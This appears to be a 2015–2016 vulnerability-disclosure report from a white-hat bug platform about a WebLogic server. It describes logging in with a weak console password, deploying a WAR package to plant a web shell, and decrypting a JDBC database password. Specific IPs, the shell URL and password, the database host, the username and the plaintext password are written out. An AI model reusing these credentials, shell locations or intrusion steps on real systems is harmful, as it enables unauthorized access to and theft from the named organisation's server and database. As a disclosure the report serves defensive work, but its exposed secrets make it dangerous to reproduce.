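2015-12-12: Details sent to the vendor; awaiting vendor handling
2015-12-16: Vendor confirmed; details disclosed to the vendor only
2015-12-26: Details disclosed to core white hats and experts in related fields
2016-01-05: Details disclosed to regular white hats
2016-01-15: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public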
RT
http://121.43.74.72:7005/tit-ydcd/
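Port 7005 runs WebLogic and has a weak password, weblogicweblogic1; login succeeded!
The next step was deploying a WAR package to get a shell! Shell address: http://121.43.74.72:7005/ca/ma3.jsp, password: carry
The host has an internal network IP, so this can further threaten intranet security!
Database configuration information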
<jdbc-driver-params>
  <url>jdbc:mysql://rdsx89pe30tuivsptgpa1.mysql.rds.aliyuncs.com:3306/dyxptdb?zeroDateTimeBehavior=convertToNull</url>
  <driver-name>com.mysql.jdbc.Driver</driver-name>
  <properties>
    <property>
      <name>user</name>
      <value>dyxpt</value>
    </property>
  </properties>
  <password-encrypted>{AES}IYsCzrIFd5XZJT4ee30e3FVkagWgXr8Z5qWe6ZRmpzk=</password-encrypted>
</jdbc-driver-params>
<jdbc-connection-pool-params>
Decrypting gives dyxptdyxpt1505, which connects to the database! The databases are
Tables in one of the databases
Query#0 : SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ='dyxptdb'
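I did not look through the sensitive information; this is only proof of impact!
Got a shell, data untouched; asking for 20 rank!
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-12-16 10:33
Adjusted
None yet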